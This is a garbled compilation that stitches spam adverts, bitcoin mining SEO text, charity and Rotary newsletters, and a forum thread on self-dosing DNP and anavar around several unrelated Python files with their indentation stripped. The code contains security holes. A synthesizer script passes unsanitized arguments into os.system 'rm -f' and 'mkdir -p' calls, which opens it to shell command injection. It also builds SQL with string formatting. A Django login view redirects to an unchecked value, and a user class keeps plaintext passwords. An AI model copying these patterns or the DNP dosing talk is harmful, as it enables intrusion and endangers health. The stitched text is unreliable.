Lowering costs is a valuable part for your task. You still need excellent quality results with House Inspector in Saint Marys, PA, and you're able to put your confidence in our staff to conserve your funds while continually giving the very best quality work. We provide the best quality while still costing you less. Our ambition is to ensure you receive the highest quality materials and a finished project that lasts over time. As an example, we are very careful to keep clear of expensive complications, deliver the results efficiently to conserve time, and be sure you get the most effective prices on materials and work. Save time and funds by contacting House Inspector Crew now. We'll be waiting to accept your call at 888-506-4448.
It is important to be knowledgeable with regards to House Inspector in Saint Marys, PA. We won't encourage you to come up with imprudent choices, since we understand exactly what we'll be doing, and we ensure you know exactly what to expect with the work. We will take the unexpected surprises from the situation through providing precise and complete info. Begin by calling 888-506-4448 to discuss your task. We'll explore your concerns once you call us and get you arranged with an appointment. We consistently appear at the arranged hour, all set to work together with you.
Many good reasons exist to consider House Inspector Crew regarding House Inspector in Saint Marys, PA. Our equipment are of the very best quality, our cash saving solutions are realistic and powerful, and our client satisfaction scores will not be topped. We have the expertise you will want to meet all your objectives. If you need House Inspector in Saint Marys, call House Inspector Crew by dialing 888-506-4448, and we are going to be beyond pleased to help.
|
import click
import logging
import mondrian
from celery.bin.celery import CeleryCommand, command_classes
from flask import current_app
from flask.cli import FlaskGroup, with_appcontext
# XXX: Do not import any mereswine modules here!
# If any import from this module triggers an exception the dev server
# will die while an exception only happening during app creation will
# be handled gracefully.
def _create_app(info):
from .factory import make_app
return make_app()
def shell_ctx():
from .core import db
ctx = {'db': db}
ctx.update((name, cls) for name, cls in db.Model._decl_class_registry.items() if hasattr(cls, '__table__'))
return ctx
def register_shell_ctx(app):
app.shell_context_processor(shell_ctx)
@click.group(cls=FlaskGroup, create_app=_create_app)
@with_appcontext
def cli():
"""
This script lets you control various aspects of Mereswine from the
command line.
"""
logger = logging.getLogger()
mondrian.setup(excepthook=True)
logger.setLevel(logging.DEBUG if current_app.debug else logging.INFO)
@cli.group(name='db')
def db_cli():
"""DB management commands"""
pass
@db_cli.command()
def drop():
"""Drop all database tables"""
from .core import db
if click.confirm('Are you sure you want to lose all your data?'):
db.drop_all()
@db_cli.command()
def create():
"""Create database tables"""
from .core import db
db.create_all()
@db_cli.command()
def recreate():
"""Recreate database tables (same as issuing 'drop' and then 'create')"""
from .core import db
if click.confirm('Are you sure you want to lose all your data?'):
db.drop_all()
db.create_all()
@cli.command()
@click.option('--uuid', help="UUID of server to crawl")
def crawl(uuid):
"""Crawl all instances, or a given UUID if passed"""
from .crawler import crawl_instance, crawl_all
if uuid is not None:
crawl_instance(uuid)
else:
crawl_all()
@cli.command(context_settings={'ignore_unknown_options': True, 'allow_extra_args': True}, add_help_option=False)
@click.pass_context
def celery(ctx):
"""Manage the Celery task daemon."""
from .tasks import celery
# remove the celery shell command
next(funcs for group, funcs, _ in command_classes if group == 'Main').remove('shell')
del CeleryCommand.commands['shell']
CeleryCommand(celery).execute_from_commandline(['mereswine celery'] + ctx.args)
|
Bitcoin Mining Definition - Bitcoin mining is the process of creating, or rather discovering, bitcoin currency.
Bitcoin Mining. 2.8K likes. Working with the latest technology we offer everyone an opportunity to have their own online crypto currency mine, based on.
We make the process of acquiring Bitcoin or Altcoins fast and easy through the use of cloud mining. Interest in cryptocurrencies has surged as bitcoin skyrocketed in value.
Mine bitcoin with our desktop mining software for Windows, with a full user interface to make the process easier than ever. Easily find out the best cloud hashing sites and providers. We offer top-of-the-line cryptocurrency mining hardware from the best global manufacturers. Genesis Mining is the largest and most trusted cloud Bitcoin mining provider in the world. Bitcoin is the first decentralized peer-to-peer payment network that is powered by its users with no central authority or middlemen.
The company attributes the increase to its semiconductor division, which manufactures bitcoin mining chips, and says that it expects the trend to continue. Disgruntled XRP Investor Hits Ripple with Class-Action Lawsuit. Our bitcoin and cryptocurrency mining guides will help you understand how mining works in the crypto space. Has easy-to-understand information on mining pools and useful tips.
Designed to make owning and circulating cryptocurrencies as easy. To form a distributed timestamp server as a peer-to-peer network, bitcoin uses a proof-of-work system. Pro HYIP provides a complete bitcoin mining script to start and manage a bitcoin program.
Mining software information, hardware, and bitcoin cloud mining basics. Find out what your expected return is depending on your hash rate and electricity cost. News, the Bitcoin community, innovations, the general environment.
While Bitcoin has become less of an outlier in recent months amid the rise of so-called alt-coins like EOS and Litecoin, the original still towers above its peers. View detailed information and charts on all Bitcoin transactions and blocks.
Investing in Cryptocurrency: we are specializing in Bitcoin mining. A pie chart showing the hashrate distribution between the major bitcoin mining pools - Blockchain.
Find all you need to know and get started with Bitcoin on bitcoin.org. Bitcoin mining synonyms, Bitcoin mining pronunciation, Bitcoin mining translation, English dictionary definition of Bitcoin mining. We help you get the lowest cost per kWh on all crypto mining rigs and miners across the globe. This game allows you to test your skill at becoming a successful Bitcoin miner. MultiMiner is a desktop application for crypto-currency mining and monitoring on Windows, Mac OS X and Linux.
|
__author__ = 'Vojda'
class User:
"""
This is the user class
"""
@classmethod
def from_dict(cls, object_dict):
return User(object_dict['username'], object_dict['password'], object_dict['admin'])
def __init__(self, username, password, admin=False):
self.username = username
self.password = password
self.admin = admin
    def to_json(self):
        # Serialize the user without exposing the password.
        import json
        return json.dumps({'username': self.username, 'admin': self.admin})
class Recipe:
"""
Recipe class representing the recipes in the db
"""
@classmethod
def from_dict(cls, object_dict):
return Recipe(object_dict['name'], object_dict['products'], object_dict['description'], object_dict['checked'], object_dict['_id'])
def __init__(self, name, products, description, checked=False, idd=None):
self.name = name
self.products = products
self.description = description
self.checked = checked
self._id = idd
class Cookie:
"""
A cookie representation:
{"hash": "SOME HASH",
     "Expires": milliseconds
}
"""
def __init__(self, hash, expires):
self.hash = hash
self.expires = expires
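A round-trip sketch of the `User` pattern above. It redefines a minimal `User` locally so the snippet is self-contained, and gives `to_json` a real JSON body (the version above is a stub returning an empty object):

```python
import json

class User:
    """Minimal local copy of the User class above, for illustration."""

    @classmethod
    def from_dict(cls, object_dict):
        return cls(object_dict['username'], object_dict['password'],
                   object_dict['admin'])

    def __init__(self, username, password, admin=False):
        self.username = username
        self.password = password
        self.admin = admin

    def to_json(self):
        # Serialize without the password, a common precaution.
        return json.dumps({'username': self.username, 'admin': self.admin})

u = User.from_dict({'username': 'alice', 'password': 's3cret', 'admin': True})
print(u.to_json())
```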
|
Established by social activists from diverse professions in 1992, the Cachar Cancer Hospital Society (CCHS) is a premier philanthropic and charitable not-for-profit NGO in North East India that is working to battle cancer. The society made a humble start almost from scratch and relentlessly strived to develop essential infrastructure and to establish and run a cancer detection and treatment centre in Silchar, at the nerve centre of the Barak Valley region. The first detection centre was started in a temporary rented room at NS Avenue on January 23, 1993.
Surrounded by Mizoram, Manipur, Meghalaya, Bangladesh and Tripura, the region's poor economic conditions, communication bottlenecks, remote geographical locations, under-developed agriculture, industry and technology, and more stood in the way of mobilizing the financial resources necessary to develop a full-fledged Cancer Hospital and Research Centre. However, numerous people, irrespective of caste, creed, religion and language, came forward to help the society in its crusade against cancer.
|
from django.contrib.auth import login, logout
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.views.generic import (
FormView,
View,
)
from auth.forms import (
LoginForm,
RegisterForm,
)
class LoginRequiredMixin(object):
@method_decorator(login_required(redirect_field_name='redirect'))
def dispatch(self, *args, **kwargs):
return super(LoginRequiredMixin, self).dispatch(*args, **kwargs)
class AuthView(FormView):
def form_valid(self, form):
user = form.save()
login(self.request, user)
return super(AuthView, self).form_valid(form)
class LoginView(AuthView):
template_name = 'auth/login.html'
form_class = LoginForm
def get_success_url(self):
return self.request.POST.get('redirect', '/')
def get_context_data(self, **kwargs):
context = super(LoginView, self).get_context_data(**kwargs)
context['redirect'] = self.request.GET.get('redirect', '/')
return context
class RegisterView(AuthView):
template_name = 'auth/register.html'
form_class = RegisterForm
success_url = '/'
class LogoutView(View):
def get(self, request):
logout(request)
return HttpResponseRedirect('/')
|
Clean Water and Sanitation - the Rotary theme for March is such a big part of life. Thank you for everything you continue to do that makes life healthier, happier, and more successful. We might take these things for granted but we know others are not so fortunate. That’s where Rotary makes a big difference. Your gifts to The Rotary Foundation provide funding for grants that might help build cisterns, purchase water filters, and much more. Let’s keep up the good work going through Foundation giving.
It seems to be a natural flow to move from clean water and sanitation to Child and Maternal Health as a monthly theme. There are opportunities of service in all these areas, near our homes or elsewhere.
Rotarians from all over the Midwest met in Itasca, IL early in March when they gathered for a weekend of training at Midwest PETS. Presidents-Elect, Nominees and other leaders returned home ready and eager to move on into the new Rotary year on July 1st. Let’s give everyone all the support we can so their year is fulfilling and successful.
Rotary Youth Programs are alive and well and growing in District 6220. Rotary clubs in Rhinelander, Stevens Point, Sturgeon Bay and Waupaca are currently sponsoring Interact Clubs. The newest club, the Interact Club of North Appleton is sponsored by the Rotary Club of Appleton. Interactors are students 12-18 years of age. Other clubs are working on plans to start an Interact club in their community.
Rotary clubs in Houghton and Hancock sponsor a Rotaract club at Michigan Tech University, the 3 Marquette Rotary Clubs sponsor Rotaract in their community. Rotaractors are young adults 18-30, sometimes college students, other times young adults working in their community wanting to be of service. A Rotaract Club can be a combination of both!
Our district has a strong Rotary Youth Exchange (RYE) program with an outstanding leadership committee. These exchanges are both long term (during the school year - up to 10-11 months) and short term exchanges (usually one month in another country with a host brother or sister and family and then a month here in our country.) These exchanges often blossom into life long friendships.
We are fortunate to have a strong Rotex group in District 6220. Rotex is a group of former exchange students who want to stay connected to Rotary. Many of these younger adults are college students, others are currently in the work force. They have their own meetings, raise their own funds, and are a big help at RYE conferences. They share their exchange experiences with the students (and their families) who are going out on exchange. The energy of all these young people is amazing. They are the future of Rotary as well as the world. Our support of these programs will help them grow. This is our investment in the future.
Congratulations to clubs that are collaborating with others to make an impact in their communities and around the world. The Rotary Club of Ishpeming is forming a partnership with local government offices and others to create a beach area at a lake nearby. This will be a good improvement and make this lake a “go to place” for families.
The Rotary Club of Shawano was recently awarded a grant that will be used in partnership with others in that community to make improvements on the Mountain Bay Trail.
The Rotary Club of Appleton, Appleton Breakfast and Appleton continue to collaborate with clubs in Neenah and Menasha. The club presidents meet monthly to plan and implement projects that benefit the entire Fox River Valley area. When clubs join forces the impact just multiplies!
A reminder to join us at DUALCON 2019, our district conference May 17-18th in Wisconsin Dells. Go to www.DUALCON2019.com to register and learn more.
Thank you for your service and dedication, you are Inspiring!
|
# -*- coding: utf-8 -*-
"""
Framework for code to synthesise a library of spectra.
"""
import argparse
import hashlib
import json
import logging
import os
import re
import sqlite3
import time
from os import path as os_path
from fourgp_speclib import SpectrumLibrarySqlite, Spectrum
from fourgp_specsynth import TurboSpectrum
from fourgp_telescope_data import FourMost
class Synthesizer:
# Convenience function to provide dictionary access to rows of an astropy table
@staticmethod
def astropy_row_to_dict(x):
return dict([(i, x[i]) for i in x.columns])
# Read input parameters
def __init__(self, library_name, logger, docstring, root_path="../../../..", spectral_resolution=50000):
self.logger = logger
self.our_path = os_path.split(os_path.abspath(__file__))[0]
self.root_path = os_path.abspath(os_path.join(self.our_path, root_path, ".."))
self.pid = os.getpid()
self.spectral_resolution = spectral_resolution
parser = argparse.ArgumentParser(description=docstring)
parser.add_argument('--output-library',
required=False,
default="turbospec_{}".format(library_name),
dest="library",
help="Specify the name of the SpectrumLibrary we are to feed synthesized spectra into.")
parser.add_argument('--workspace', dest='workspace', default="",
help="Directory where we expect to find spectrum libraries.")
parser.add_argument('--create',
required=False,
action='store_true',
dest="create",
help="Create a clean SpectrumLibrary to feed synthesized spectra into")
parser.add_argument('--no-create',
required=False,
action='store_false',
dest="create",
help="Do not create a clean SpectrumLibrary to feed synthesized spectra into")
parser.set_defaults(create=True)
parser.add_argument('--log-dir',
required=False,
default="/tmp/turbospec_{}_{}".format(library_name, self.pid),
dest="log_to",
help="Specify a log directory where we log our progress and configuration files.")
parser.add_argument('--dump-to-sqlite-file',
required=False,
default="",
dest="sqlite_out",
help="Specify an sqlite3 filename where we dump the stellar parameters of the stars.")
parser.add_argument('--line-lists-dir',
required=False,
default=self.root_path,
dest="lines_dir",
help="Specify a directory where line lists for TurboSpectrum can be found.")
parser.add_argument('--elements',
required=False,
default="",
dest="elements",
help="Only read the abundances of a comma-separated list of elements, and use scaled-solar "
"abundances for everything else.")
parser.add_argument('--binary-path',
required=False,
default=self.root_path,
dest="binary_path",
help="Specify a directory where Turbospectrum and Interpol packages are installed.")
parser.add_argument('--every',
required=False,
default=1,
type=int,
dest="every",
help="Only process every nth spectrum. "
"This is useful when parallelising this script across multiple processes.")
parser.add_argument('--skip',
required=False,
default=0,
type=int,
dest="skip",
help="Skip n spectra before starting to process every nth. "
"This is useful when parallelising this script across multiple processes.")
parser.add_argument('--limit',
required=False,
default=0,
type=int,
dest="limit",
help="Only process a maximum of n spectra.")
self.args = parser.parse_args()
logging.info("Synthesizing {} to <{}>".format(library_name, self.args.library))
# Set path to workspace where we create libraries of spectra
self.workspace = (self.args.workspace if self.args.workspace else
os_path.abspath(os_path.join(self.our_path, root_path, "workspace")))
os.system("mkdir -p {}".format(self.workspace))
def set_star_list(self, star_list):
self.star_list = star_list
# Ensure that every star has a name; number stars if not
for i, item in enumerate(self.star_list):
if 'name' not in item:
item['name'] = "star_{:08d}".format(i)
# Ensure that every star has free_abundances and extra metadata
for i, item in enumerate(self.star_list):
if 'free_abundances' not in item:
item['free_abundances'] = {}
if 'extra_metadata' not in item:
item['extra_metadata'] = {}
if 'microturbulence' not in item:
item['microturbulence'] = 1
# Ensure that we have a table of input data to dump to SQLite, if requested
for item in self.star_list:
if 'input_data' not in item:
item['input_data'] = {'name': item['name'],
'Teff': item['Teff'],
'[Fe/H]': item['[Fe/H]'],
'logg': item['logg']}
item['input_data'].update(item['free_abundances'])
item['input_data'].update(item['extra_metadata'])
if 'name' not in item['input_data']:
item['input_data']['name'] = item['name']
def dump_stellar_parameters_to_sqlite(self):
# Output data into sqlite3 db
if self.args.sqlite_out:
os.system("rm -f {}".format(self.args.sqlite_out))
conn = sqlite3.connect(self.args.sqlite_out)
c = conn.cursor()
columns = []
for col_name, col_value in list(self.star_list[0]['input_data'].items()):
col_type_str = isinstance(col_value, str)
columns.append("{} {}".format(col_name, "TEXT" if col_type_str else "REAL"))
c.execute("CREATE TABLE stars (uid INTEGER PRIMARY KEY, {});".format(",".join(columns)))
for i, item in enumerate(self.star_list):
print("Writing sqlite parameter dump: %5d / %5d" % (i, len(self.star_list)))
c.execute("INSERT INTO stars (name) VALUES (?);", (item['input_data']['name'],))
uid = c.lastrowid
for col_name in item['input_data']:
if col_name == "name":
continue
arguments = (
str(item['input_data'][col_name]) if isinstance(item['input_data'][col_name], str)
else float(item['input_data'][col_name]),
uid
)
c.execute("UPDATE stars SET %s=? WHERE uid=?;" % col_name, arguments)
conn.commit()
conn.close()
def create_spectrum_library(self):
# Create new SpectrumLibrary
self.library_name = re.sub("/", "_", self.args.library)
self.library_path = os_path.join(self.workspace, self.library_name)
self.library = SpectrumLibrarySqlite(path=self.library_path, create=self.args.create)
# Invoke FourMost data class. Ensure that the spectra we produce are much higher resolution than 4MOST.
# We down-sample them later to whatever resolution we actually want.
self.FourMostData = FourMost()
self.lambda_min = self.FourMostData.bands["LRS"]["lambda_min"]
self.lambda_max = self.FourMostData.bands["LRS"]["lambda_max"]
self.line_lists_path = self.FourMostData.bands["LRS"]["line_lists_edvardsson"]
# Invoke a TurboSpectrum synthesizer instance
self.synthesizer = TurboSpectrum(
turbospec_path=os_path.join(self.args.binary_path, "turbospectrum-15.1/exec-gf-v15.1"),
interpol_path=os_path.join(self.args.binary_path, "interpol_marcs"),
line_list_paths=[os_path.join(self.args.lines_dir, self.line_lists_path)],
marcs_grid_path=os_path.join(self.args.binary_path, "fromBengt/marcs_grid"))
self.synthesizer.configure(lambda_min=self.lambda_min,
lambda_max=self.lambda_max,
lambda_delta=float(self.lambda_min) / self.spectral_resolution,
line_list_paths=[os_path.join(self.args.lines_dir, self.line_lists_path)],
stellar_mass=1)
self.counter_output = 0
# Start making log output
os.system("mkdir -p {}".format(self.args.log_to))
self.logfile = os.path.join(self.args.log_to, "synthesis.log")
def do_synthesis(self):
# Iterate over the spectra we're supposed to be synthesizing
with open(self.logfile, "w") as result_log:
for star in self.star_list:
star_name = star['name']
unique_id = hashlib.md5(os.urandom(32)).hexdigest()[:16]
metadata = {
"Starname": str(star_name),
"uid": str(unique_id),
"Teff": float(star['Teff']),
"[Fe/H]": float(star['[Fe/H]']),
"logg": float(star['logg']),
"microturbulence": float(star["microturbulence"])
}
# User can specify that we should only do every nth spectrum, if we're running in parallel
self.counter_output += 1
if (self.args.limit > 0) and (self.counter_output > self.args.limit):
break
if (self.counter_output - self.args.skip) % self.args.every != 0:
continue
# Pass list of the abundances of individual elements to TurboSpectrum
free_abundances = dict(star['free_abundances'])
for element, abundance in list(free_abundances.items()):
metadata["[{}/H]".format(element)] = float(abundance)
# Propagate all ionisation states into metadata
metadata.update(star['extra_metadata'])
# Configure Turbospectrum with the stellar parameters of the next star
self.synthesizer.configure(
t_eff=float(star['Teff']),
metallicity=float(star['[Fe/H]']),
log_g=float(star['logg']),
stellar_mass=1 if "stellar_mass" not in star else star["stellar_mass"],
turbulent_velocity=1 if "microturbulence" not in star else star["microturbulence"],
free_abundances=free_abundances
)
# Make spectrum
time_start = time.time()
turbospectrum_out = self.synthesizer.synthesise()
time_end = time.time()
# Log synthesizer status
logfile_this = os.path.join(self.args.log_to, "{}.log".format(star_name))
with open(logfile_this, "w") as log_f:
    log_f.write(json.dumps(turbospectrum_out))
# Check for errors
errors = turbospectrum_out['errors']
if errors:
result_log.write("[{}] {:6.0f} sec {}: {}\n".format(time.asctime(),
time_end - time_start,
star_name,
errors))
logging.warning("Star <{}> could not be synthesised. Errors were: {}".
                format(star_name, errors))
result_log.flush()
continue
else:
logging.info("Synthesis completed without error.")
# Fetch filename of the spectrum we just generated
filepath = os_path.join(turbospectrum_out["output_file"])
# Insert spectrum into SpectrumLibrary
try:
filename = "spectrum_{:08d}".format(self.counter_output)
# First import continuum-normalised spectrum, which is in columns 1 and 2
metadata['continuum_normalised'] = 1
spectrum = Spectrum.from_file(filename=filepath, metadata=metadata, columns=(0, 1), binary=False)
self.library.insert(spectra=spectrum, filenames=filename)
# Then import version with continuum, which is in columns 1 and 3
metadata['continuum_normalised'] = 0
spectrum = Spectrum.from_file(filename=filepath, metadata=metadata, columns=(0, 2), binary=False)
self.library.insert(spectra=spectrum, filenames=filename)
except (ValueError, IndexError):
result_log.write("[{}] {:6.0f} sec {}: {}\n".format(time.asctime(), time_end - time_start,
star_name, "Could not read bsyn output"))
result_log.flush()
continue
# Update log file to show our progress
result_log.write("[{}] {:6.0f} sec {}: {}\n".format(time.asctime(), time_end - time_start,
star_name, "OK"))
result_log.flush()
def clean_up(self):
logging.info("Synthesized {:d} spectra.".format(self.counter_output))
# Close TurboSpectrum synthesizer instance
self.synthesizer.close()
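The `--every`, `--skip`, and `--limit` options exist so several copies of this script can split one star list between them. A minimal, standalone sketch of that filter logic (the helper name `should_process` is ours, not part of the pipeline):

```python
def should_process(counter, every=1, skip=0, limit=0):
    """Replicates the --every/--skip/--limit filter in do_synthesis.

    counter is 1-based, matching self.counter_output after the increment.
    Returns (process, stop): whether to synthesise this spectrum, and
    whether the overall limit has been reached.
    """
    if limit > 0 and counter > limit:
        return False, True
    return (counter - skip) % every == 0, False

# Two workers splitting a list of 6 spectra between them:
worker_a = [n for n in range(1, 7) if should_process(n, every=2, skip=0)[0]]
worker_b = [n for n in range(1, 7) if should_process(n, every=2, skip=1)[0]]
```

With `every=2`, the workers with `skip=0` and `skip=1` cover the full list with no overlap, which is why the help text suggests these flags for parallelisation.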
|
Don't Just Browse Online Dating Success Stories - Become One! Sign Up With Afro Romance Today And Start Meeting White Singles In The La Trinite Sur Mer Area.
Find Someone Who Shares Your Interests And Your Zip Code With AfroRomance - We Have Plenty Of White Singles Conveniently Located In La Trinite Sur Mer!
Double your chances of finding love: when you join AfroRomance, you are introduced to hundreds of hot White singles in La Trinite Sur Mer. Sign up with us today and you could be meeting the man or woman of your dreams tomorrow! At AfroRomance find someone with similar interests as yourself and start your romantic journey with us.
Now it's easier than ever to make that connection - sign up with AfroRomance and meet hot and White singles in La Trinite Sur Mer online today! Thanks to our fantastic dating system at AfroRomance, for no charge you can join us, create a profile, and browse the profiles of members before deciding if you'd like to start getting to know them better.
|
"""
Program name: MPS-Proba
Program purpose: The Alpha version of the APC 524 project.
File name: projectionboys.py
File purpose: the projection boys model
Responsible person: Bin Xu
"""
from numpy import zeros
import numpy as np
from model import Model
class ProjectionBoys(Model):
"""
A probabilistic model that describes the model in human language and gives some parameters.
"""
def __init__(self, size, p0, p1, q1, q2, init_state):
super(ProjectionBoys, self).__init__()
self.size = size
self.p0 = p0
self.p1 = p1
self.q1 = q1
self.q2 = q2
self.init_state = init_state
self.model_type = "ProjectionBoys"
self.hamiltonian = r"H = p_0 I + \sum_{i=1}^{n-1}\left[\frac{p_1}{n-1}\sigma_i^x\otimes\sigma_{i+1}^x + \frac{q_1}{n-1}\pi_i^+\otimes\pi_{i+1}^+ + \frac{q_2}{n-1}\pi_i^-\otimes\pi_{i+1}^-\right]"
self.normalizeTMat()
def normalizeTMat(self):
totalproba = self.p0 + self.p1 + self.q1 + self.q2
self.p0 /= totalproba
self.p1 /= totalproba
self.p1 /= self.size - 1
self.q1 /= totalproba
self.q1 /= self.size - 1
self.q2 /= totalproba
self.q2 /= self.size - 1
def prepareMpo(self):
#initialize the MPO
self.mpo = []
mpo_left = zeros(shape = (2, 2, 1, 5), dtype = float)
mpo_middle = zeros(shape = (2, 2, 5, 5), dtype = float)
mpo_right = zeros(shape = (2, 2, 5, 1), dtype = float)
# remember our convention: phys_in, phys_out, aux_l, aux_r
# mpo_left = [p0 I, p1 Sx, q1 Pi+, q2 Pi-, I]
mpo_left[:, :, 0, 0] = self.p0 * self.I
mpo_left[:, :, 0, 1] = self.p1 * self.sigma_x
mpo_left[:, :, 0, 2] = self.q1 * self.pi_plus
mpo_left[:, :, 0, 3] = self.q2 * self.pi_minus
mpo_left[:, :, 0, 4] = self.I
# mpo_middle = [I, 0, 0, 0, 0]
# [Sx, 0, 0, 0, 0]
# [pi+, 0, 0, 0, 0]
# [pi-, 0, 0, 0, 0]
# [0, p1 Sx, q1 pi+, q2 pi-, I]
mpo_middle[:, :, 0, 0] = self.I
mpo_middle[:, :, 1, 0] = self.sigma_x
mpo_middle[:, :, 2, 0] = self.pi_plus
mpo_middle[:, :, 3, 0] = self.pi_minus
mpo_middle[:, :, 4, 1] = self.p1 * self.sigma_x
mpo_middle[:, :, 4, 2] = self.q1 * self.pi_plus
mpo_middle[:, :, 4, 3] = self.q2 * self.pi_minus
mpo_middle[:, :, 4, 4] = self.I
# mpo_right = [I, Sx, pi+, pi-, 0].transpose
mpo_right[:, :, 0, 0] = self.I
mpo_right[:, :, 1, 0] = self.sigma_x
mpo_right[:, :, 2, 0] = self.pi_plus
mpo_right[:, :, 3, 0] = self.pi_minus
# store the list of mpo's
self.mpo.append(mpo_left)
for i in range(self.size-2):
self.mpo.append(mpo_middle)
self.mpo.append(mpo_right)
def prepareMps(self):
self.mps = []
if self.init_state == "all down":
for i in range(self.size):
new_mps = zeros(shape = (2, 1, 1), dtype = float)
new_mps[0, 0, 0] = 1
self.mps.append(new_mps)
elif type(self.init_state) == list:
if len(self.init_state) != self.size:
raise Exception("The size of the initial condition does not match with the size of the model.")
for i in range(self.size):
new_mps = zeros(shape = (2, 1, 1), dtype = float)
if self.init_state[i] == 0:
new_mps[0, 0, 0] = 1
elif self.init_state[i] == 1:
new_mps[1, 0, 0] = 1
else:
raise Exception("Initial condition can only have 0 or 1 for this model.")
self.mps.append(new_mps)
else:
raise Exception("Initial condition not supported!")
def prepareTransitionalMat(self):
#create sigma_x matrix
sigmax = np.matrix(self.sigma_x)
pi_plus = np.matrix(self.pi_plus).T
pi_minus = np.matrix(self.pi_minus).T
#non changing channel
self.H = self.p0*np.identity(2**self.size) # not changing states
# sigma_x channel
for i in range(self.size-1):
Tmatrix = np.identity(1)
for j in range(self.size):
if j == i or j == i+1:
Tmatrix = np.kron(Tmatrix, sigmax)
else:
Tmatrix = np.kron(Tmatrix, np.identity(2))
self.H = np.add(self.H, Tmatrix * self.p1)
# pi+ channel
for i in range(self.size-1):
Tmatrix = np.identity(1)
for j in range(self.size):
if j == i or j == i+1:
Tmatrix = np.kron(Tmatrix, pi_plus)
else:
Tmatrix = np.kron(Tmatrix, np.identity(2))
self.H = np.add(self.H, Tmatrix * self.q1)
# pi- channel
for i in range(self.size-1):
Tmatrix = np.identity(1)
for j in range(self.size):
if j == i or j == i+1:
Tmatrix = np.kron(Tmatrix, pi_minus)
else:
Tmatrix = np.kron(Tmatrix, np.identity(2))
self.H = np.add(self.H, Tmatrix * self.q2)
def prepareExactInitState(self):
self.init_exact = np.zeros((2**self.size, 1))
if self.init_state == "all down":
self.init_exact[0] = 1
else:
raise Exception("Init state not supported!")
def __repr__(self):
return ("Hamiltonian: " + self.hamiltonian + "\nSystem length = " + str(self.size) + "\nremain_proba = " + str(self.p0) + "\ninitial state: " + str(self.init_state))
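The arithmetic in `normalizeTMat` spreads each pairwise coupling over the chain's size − 1 bonds after the global normalisation. A standalone check of that arithmetic (the `normalize` helper below is illustrative, not part of the module):

```python
def normalize(p0, p1, q1, q2, size):
    # Mirrors ProjectionBoys.normalizeTMat: divide everything by the total,
    # then share each pairwise coupling across the (size - 1) bonds.
    total = p0 + p1 + q1 + q2
    p0 /= total
    p1 /= total * (size - 1)
    q1 /= total * (size - 1)
    q2 /= total * (size - 1)
    return p0, p1, q1, q2

p0, p1, q1, q2 = normalize(2.0, 1.0, 0.5, 0.5, size=5)
# The identity channel plus all (size - 1) bonds' couplings sum to one,
# so the transition matrix conserves total probability.
assert abs(p0 + 4 * (p1 + q1 + q2) - 1.0) < 1e-12
```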
|
Morning by Morning has long been a favorite devotional because of the simple yet profound, practical and deeply spiritual insights from the "Prince of Preachers", Charles Haddon Spurgeon. The 366 succinct devotions will inspire and enrich today's busy readers in a wonderful way. This delightful, compact volume features: a luxleather foiled cover; gilt-edged pages; an attached ribbon page marker and a presentation page for gift-giving.
|
# -*- coding: utf-8 -*-
from django.core.cache import get_cache
from kway import settings, utils
def get_value_for_key(key, default_value = None):
cache = get_cache(settings.KWAY_CACHE_NAME)
localized_key = utils.get_localized_key(key)
value = None
if cache:
value = cache.get(localized_key, None)
if value:
cache.set(localized_key, value)
cache.close()
return value or default_value
def set_value_for_key(key, value):
cache = get_cache(settings.KWAY_CACHE_NAME)
localized_key = utils.get_localized_key(key)
if cache:
if value:
cache.set(localized_key, value)
else:
cache.delete(localized_key)
cache.close()
return value
def update_values_post_save(sender, instance, **kwargs):
if kwargs['created']:
return
cache = get_cache(settings.KWAY_CACHE_NAME)
if cache:
for language in settings.KWAY_LANGUAGES:
language_code = language[0]
localized_key = utils.get_localized_key(instance.key, language_code)
localized_value_field_name = utils.get_localized_value_field_name(language_code)
localized_value = getattr(instance, localized_value_field_name)
cache.set(localized_key, localized_value)
cache.close()
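Note the asymmetry in `set_value_for_key`: truthy values are cached, while falsy values evict the key. A dict-backed sketch of that behaviour (`FakeCache` is a hypothetical stand-in, not a real Django cache backend):

```python
class FakeCache:
    """Minimal stand-in for a Django cache backend (illustrative only)."""
    def __init__(self):
        self._store = {}
    def get(self, key, default=None):
        return self._store.get(key, default)
    def set(self, key, value):
        self._store[key] = value
    def delete(self, key):
        self._store.pop(key, None)
    def close(self):
        pass

def set_value_for_key(cache, key, value):
    # A truthy value is cached; a falsy one evicts the key instead.
    if value:
        cache.set(key, value)
    else:
        cache.delete(key)
    cache.close()
    return value

cache = FakeCache()
set_value_for_key(cache, "en:greeting", "hello")
assert cache.get("en:greeting") == "hello"
set_value_for_key(cache, "en:greeting", None)  # falsy value deletes the key
assert cache.get("en:greeting") is None
```

This makes storing `None` (or `""`) equivalent to deleting, which is why the read path at the top of the module falls back to `default_value` when the cache misses.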
|
Stats: 6'1 and 205lb with 12% bf trying to go down to 8-9.
I have been using anavar (and creatine) at 30mg for 3 weeks now (I can't take test, recovery is too heavy, have done bloods after anavar before and bounced right back unlike test) and DNP at a 200mg dosage for the last 5 days. Today is day 6 and I have been having a tingling/prickling sensation on the bottom of my feet/toes like I've been sitting on my legs for too long. This happened when I sat at my desk, and when I started walking around the feeling dissipated slowly. I also have this feeling around my shins, almost feels like shin splints. I know I am holding a ton of water because my abs were visible, but look blurry now, and am drinking 1.5 gallons a day.
I am thinking the cause is fluids because the dosage (200mg) is so low, and the duration too, I'm only 6 days in. Can neuropathy develop this fast, or is this because of too many electrolytes flushing out of my body because of the combo anavar + DNP + creatine?
I don't think it's PN. Yet.
I've had so many weird sensations while on DNP, never turned into PN.
Doesn't sound like it. When I had it I didn't have any issues going up to the shin. Big toe was super sensitive and it wasn't fun being barefoot.
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Attendee'
db.create_table('cert_attendee', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('pub_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=80)),
('email', self.gf('django.db.models.fields.EmailField')(max_length=254)),
))
db.send_create_signal('cert', ['Attendee'])
# Adding M2M table for field events on 'Attendee'
db.create_table('cert_attendee_events', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('attendee', models.ForeignKey(orm['cert.attendee'], null=False)),
('event', models.ForeignKey(orm['events.event'], null=False))
))
db.create_unique('cert_attendee_events', ['attendee_id', 'event_id'])
def backwards(self, orm):
# Deleting model 'Attendee'
db.delete_table('cert_attendee')
